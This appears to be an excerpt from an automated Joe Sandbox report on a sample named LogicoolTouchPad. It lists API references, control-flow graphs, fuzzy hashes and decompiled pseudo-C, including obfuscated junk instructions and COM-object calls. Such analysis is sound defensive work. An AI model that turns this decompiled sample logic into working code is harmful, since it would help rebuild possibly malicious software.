                    APIs
                    • FindResourceA.KERNEL32(?,?,?,00419B04,?,00000001,00000000,?,0041E214,?,?,?,?,0041B2BD,0000000A), ref: 0041E2BB
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: FindResource
                    • String ID:
                    • API String ID: 1635176832-0
                    • Opcode ID: 37d2375809f074c101ec159dc7c087eeca16e56ff38e1af19beff26740b98322
                    • Instruction ID: e7fca79196f4b9a13c7c0c5f746558b8b00f3a95277a34964b29b902c38106e5
                    • Opcode Fuzzy Hash: 37d2375809f074c101ec159dc7c087eeca16e56ff38e1af19beff26740b98322
                    • Instruction Fuzzy Hash: 82F04BB66052046F9704EE5EE881D9B77ECEE8836431100AEF908DB242DA39DD518779
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 493 451728-451742 495 451747-45174a 493->495 496 451751-451754 495->496 497 45174c-45174f 495->497 498 451756-45175c 496->498 499 45175e 496->499 497->496 497->498 500 451760-45177b LoadCursorA call 4517e0 498->500 499->500 500->495 503 45177d-451781 500->503
                    APIs
                    • LoadCursorA.USER32(00000000,00000000,?,?,?,0044A768,004513AF,?,?,00000000,?,0043F9D2), ref: 00451764
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: CursorLoad
                    • String ID:
                    • API String ID: 3238433803-0
                    • Opcode ID: 424c217fda72ae87e93cba9b36545e1173e55a5b0716aad7e59c5948895de161
                    • Instruction ID: 01bbe981f386afef1924bbb56251639ee72f7836fc1a3dbaa2450e4d7e9bf1ab
                    • Opcode Fuzzy Hash: 424c217fda72ae87e93cba9b36545e1173e55a5b0716aad7e59c5948895de161
                    • Instruction Fuzzy Hash: 8DF08921B04104179620257D5CC1B2A72849B85736F21037BFD3AC63E2C7395C49815D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 504 4253b4-4253f0 call 42566c GetTextExtentPoint32A
                    APIs
                    • GetTextExtentPoint32A.GDI32(?,00000000,?,?,?,?,0042540C), ref: 004253E8
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: ExtentPoint32Text
                    • String ID:
                    • API String ID: 223599850-0
                    • Opcode ID: a304844cc6d7a831491cc87d84eeb58497e05e002272473859f61d3049febff2
                    • Instruction ID: a5b968425a3a8d1d7692738480fa707cd01a6e3877afbcfd67fac92e63d24ae0
                    • Opcode Fuzzy Hash: a304844cc6d7a831491cc87d84eeb58497e05e002272473859f61d3049febff2
                    • Instruction Fuzzy Hash: 63E0ECE63016105BC391FFBE9C81A6BAADD9ECD264309887FB58DD7352E5B8CC014768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 004227B2
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 432943f2fc16d2ad08087765657fa86938ba548e6a605329295f2dc310678a93
                    • Instruction ID: 5098daf06d22fde4b2b0a8b5ef3d290ffb6e58937c7bca4746b9f95684989b0b
                    • Opcode Fuzzy Hash: 432943f2fc16d2ad08087765657fa86938ba548e6a605329295f2dc310678a93
                    • Instruction Fuzzy Hash: A11136743047169FC710EF19E980B42BBE4EB98390B14C53BE9589B385D7B8E9109BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E00403614(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a584) {
                    				void* _v0;
                    				void* _v4;
                    				void* _v24;
                    				void* _v28;
                    				void* _v44;
                    				void* _v48;
                    				void* _v64;
                    				void* _v72;
                    				void* _v76;
                    				void* _v80;
                    				void* _t60;
                    				void* _t73;
                    				void* _t74;
                    
                    				_t74 = __esi;
                    				_t73 = __edi;
                    				_t60 = __ebx;
                    				asm("repe jl 0x82");
                    				asm("sbb eax, 0xe3255a62");
                    			}
















                    0x00403614
                    0x00403614
                    0x00403614
                    0x00403615
                    0x00403618

                    Memory Dump Source
                    • Source File: 0000001B.00000002.524259595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_400000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dc0f0323f284f7f25937e02f7ec02137921f613abea7a369f82f210be5d8508
                    • Instruction ID: f0cf91e2c5ed039c05bcd93b3431d43edfe09bcfde1b7e1a9bf3de9dea03c2c8
                    • Opcode Fuzzy Hash: 5dc0f0323f284f7f25937e02f7ec02137921f613abea7a369f82f210be5d8508
                    • Instruction Fuzzy Hash: 2D51BFB0648301AFE320CF64DC46B5ABFE9EF84B05F10891DF588AB2C0D779A645CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 31%
                    			E00403683(signed int __eax, void* __esi, intOrPtr* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, char _a32, char _a36, intOrPtr _a572) {
                    				char _v0;
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				intOrPtr* _v12;
                    				intOrPtr* _v16;
                    				char _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v76;
                    				intOrPtr _v84;
                    				intOrPtr _v88;
                    				intOrPtr _v92;
                    				intOrPtr* _t36;
                    				intOrPtr* _t38;
                    				intOrPtr* _t40;
                    				intOrPtr* _t43;
                    				intOrPtr _t44;
                    				intOrPtr _t50;
                    				void* _t57;
                    				char* _t60;
                    				intOrPtr* _t61;
                    
                    				_t35 = __eax;
                    				asm("out 0x6c, al");
                    				 *__eax =  *__eax + 0x53;
                    				 *0xd85fdda6 = __eax;
                    				if( *__eax != 0) {
                    					 *(__esi - 0x7f) =  !( *(__esi - 0x7f));
                    					asm("in al, dx");
                    					 *(__eax ^ 0x00000002) =  *(__eax ^ 0x00000002) + (__eax ^ 0x00000002);
                    					_a8 = 0;
                    					_v0 = 0;
                    					_a12 = 0;
                    					_a16 = _a572;
                    					_v4 =  *0x40bcb1(0, 0);
                    					_t50 =  *0x40bcbd(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
                    					_v40 = _t50;
                    					_t35 =  &_v36;
                    					_a4 = 0x242e4b00;
                    					_v4 = 0x11d01d3a;
                    					_v0 = 0xaa001f89;
                    					_v12 = 0x242e4b00;
                    				}
                    				_a24 = 0x11cf737f;
                    				_a20 = 0xdc12a687;
                    				_a36 = 0x4590f811;
                    				_a28 = 0xaa004d88;
                    				_t36 =  *0x40bcb9( &_a36, 0, 1,  &_a20, _t35); // executed
                    				_v16 = _t36;
                    				if(_t36 >= 0) {
                    					_t60 =  &_a32;
                    					E00406DC0(_t36,  &_a20,  &_a36, _t57, _t60);
                    					_t61 = _t61 + 8;
                    					_t43 = _v16;
                    					_t56 = _t61;
                    					_t54 =  *_t43;
                    					_t44 =  *((intOrPtr*)( *_t43 + 0xc))(_t43, _t60, 0, 0, 0, 0, 0, 0, _t61, 0x87, _t60, 0x7b);
                    					_v56 = _t44;
                    					if(_t44 >= 0) {
                    						_v88 =  *0x40bcb5(_v60, 0xa, 0, 0, 3, 3, 0, 0);
                    						_push(_v76);
                    						_push(_v92);
                    						_push(0x63);
                    						E00406DC0(_t45, _t54, _t56, _t57, _t60);
                    						_t61 = _t61 + 8;
                    						_v84 = 1;
                    					}
                    				}
                    				if( *_t61 != 0) {
                    					_t40 =  *_t61;
                    					 *((intOrPtr*)( *_t40 + 8))(_t40);
                    				}
                    				if(_v12 != 0) {
                    					_t38 = _v12;
                    					 *((intOrPtr*)( *_t38 + 8))(_t38);
                    				}
                    				return _v8;
                    			}

























                    0x00403683
                    0x00403683
                    0x00403685
                    0x00403688
                    0x0040368d
                    0x0040368f
                    0x00403692
                    0x00403695
                    0x0040369e
                    0x004036a6
                    0x004036ad
                    0x004036b5
                    0x004036c3
                    0x004036d9
                    0x004036df
                    0x004036e3
                    0x004036e7
                    0x004036ef
                    0x004036f7
                    0x004036ff
                    0x004036ff
                    0x00403707
                    0x0040370f
                    0x00403717
                    0x0040371f
                    0x00403736
                    0x0040373e
                    0x00403742
                    0x00403744
                    0x00403750
                    0x00403755
                    0x00403758
                    0x0040375c
                    0x0040375e
                    0x0040376f
                    0x00403774
                    0x00403778
                    0x00403792
                    0x00403796
                    0x0040379a
                    0x0040379e
                    0x004037a0
                    0x004037a5
                    0x004037a8
                    0x004037a8
                    0x00403778
                    0x004037b4
                    0x004037b6
                    0x004037bc
                    0x004037bc
                    0x004037c4
                    0x004037c6
                    0x004037cd
                    0x004037cd
                    0x004037db

                    Memory Dump Source
                    • Source File: 0000001B.00000002.524259595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_400000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2d5b6c685d0cf83ec72fbb8b29bcda26f7de013d4d821f8325eb8d1b80e14f9
                    • Instruction ID: 151e8a47d3d5adcfe89f7a6f3b5dcc613d686ce9b644c516d60916ac57fdc563
                    • Opcode Fuzzy Hash: b2d5b6c685d0cf83ec72fbb8b29bcda26f7de013d4d821f8325eb8d1b80e14f9
                    • Instruction Fuzzy Hash: 09413BB0648301AFE3209F10DC55B1BBBE4AB84B05F10891DF589AB2D0D7B9A905CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetMonitorInfoA.USER32(?,?), ref: 0042A6D9
                    • GetSystemMetrics.USER32(00000000), ref: 0042A715
                    • GetSystemMetrics.USER32(00000001), ref: 0042A720
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem$InfoMonitor
                    • String ID: DISPLAY$GetMonitorInfo
                    • API String ID: 4250584380-1633989206
                    • Opcode ID: 507bf44c68e311ac499a57208938ae35054168603414f5465b73ae0ec5451901
                    • Instruction ID: 6c2b4adc3577e91d36a678d6d6c384aeaba3353cf7b34e54db395bd7a9fd44b8
                    • Opcode Fuzzy Hash: 507bf44c68e311ac499a57208938ae35054168603414f5465b73ae0ec5451901
                    • Instruction Fuzzy Hash: 91110F717027249FD720EF24AC44BABB7B8EB45720F50443BEC0597280D6B8E814CBAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: InitVariant
                    • String ID:
                    • API String ID: 1927566239-0
                    • Opcode ID: fd37230115371943d26fe4f445bb2f53f54ead115de5cb4325fd13df20f2598e
                    • Instruction ID: 32911fd6a82bbd348a1176bd83e59c6ca0e4c9bb491d43af70882a249b7519df
                    • Opcode Fuzzy Hash: fd37230115371943d26fe4f445bb2f53f54ead115de5cb4325fd13df20f2598e
                    • Instruction Fuzzy Hash: 0FB12C39A00109EFCB10EF95C4918EDB7B5EF8D714FA044B6E900A7751D738AE86DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042A95D
                    • GetSystemMetrics.USER32(00000000), ref: 0042A982
                    • GetSystemMetrics.USER32(00000001), ref: 0042A98D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem$DisplayEnumMonitors
                    • String ID: EnumDisplayMonitors
                    • API String ID: 1389147845-2491903729
                    • Opcode ID: 4e3a3059197fc1f0d46d51edac9c78d502ffd08b32bb3d9d9b41e5a10404bfa4
                    • Instruction ID: 8a28b65efb05625a1c49d6f4658e09d9faf253bff4592c072c0946955b27e940
                    • Opcode Fuzzy Hash: 4e3a3059197fc1f0d46d51edac9c78d502ffd08b32bb3d9d9b41e5a10404bfa4
                    • Instruction Fuzzy Hash: 593130B1B01219ABCB10DFA5ED44AEF77BCAF05314F404127FD15E3241DA389A51CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A7E9
                    • GetSystemMetrics.USER32(00000001), ref: 0042A7F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: DISPLAY$GetMonitorInfoA
                    • API String ID: 4116985748-1370492664
                    • Opcode ID: a731b55a73754689698e8ace40dffcb64d4f7acfa33f597ad87e13425f4ac8a4
                    • Instruction ID: dd126e816c9cd9ecb882c9608e50628a39e24879929c927f469459e115516461
                    • Opcode Fuzzy Hash: a731b55a73754689698e8ace40dffcb64d4f7acfa33f597ad87e13425f4ac8a4
                    • Instruction Fuzzy Hash: 5111E4717027609FD720AF64AC44BB7B7E8EB09324F80453BEC1597240DB78A951C7AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A8BD
                    • GetSystemMetrics.USER32(00000001), ref: 0042A8C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: DISPLAY$GetMonitorInfoW
                    • API String ID: 4116985748-2774842281
                    • Opcode ID: 45081c7b24369bbe895243bba8ad33161edcfdb27f15ab84a860727720d02a20
                    • Instruction ID: f2529c39d11673e4f4ebd3016a24e407d5374938f4a1d2b63915d66a4773299c
                    • Opcode Fuzzy Hash: 45081c7b24369bbe895243bba8ad33161edcfdb27f15ab84a860727720d02a20
                    • Instruction Fuzzy Hash: 2D11E7717027219FD710AF25AC44767B7E4EF49310F80453BEC45D7240D6B46991C7AA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A65E
                    • GetSystemMetrics.USER32(00000001), ref: 0042A670
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: MonitorFromPoint
                    • API String ID: 4116985748-1072306578
                    • Opcode ID: aecec15bed5305295d07abd60dc6b2d9635c8a7a47802c78cc95a3f9d16e88ad
                    • Instruction ID: bfa15d91ba6129cd55bd6d393177f64770d5ef16a76cd6e2296fb9b71418b36b
                    • Opcode Fuzzy Hash: aecec15bed5305295d07abd60dc6b2d9635c8a7a47802c78cc95a3f9d16e88ad
                    • Instruction Fuzzy Hash: BE012631302228AFDB008F55FC44B5E7B58EB04364F898537FD848B210CB78AC658BAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemMetrics.USER32(00000000), ref: 0042A539
                    • GetSystemMetrics.USER32(00000001), ref: 0042A545
                    Strings
                    Memory Dump Source
                    • Source File: 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_27_2_40c000_LogicoolTouchPad.jbxd
                    Similarity
                    • API ID: MetricsSystem
                    • String ID: MonitorFromRect
                    • API String ID: 4116985748-4033241945
                    • Opcode ID: ad1dca2929db28806eb3eddb2c309d1b607e4a4cf2241eba59b83720e98ba69d
                    • Instruction ID: e0e6cd1effd1234d494721701fd0864a44d253c3b7350921cb9281feb361c97d
                    • Opcode Fuzzy Hash: ad1dca2929db28806eb3eddb2c309d1b607e4a4cf2241eba59b83720e98ba69d
                    • Instruction Fuzzy Hash: 6E016771305224AFD7109B18F9457677768DB457A5F948067ED04DB202CA78EC908BAA
                    Uniqueness

                    Uniqueness Score: -1.00%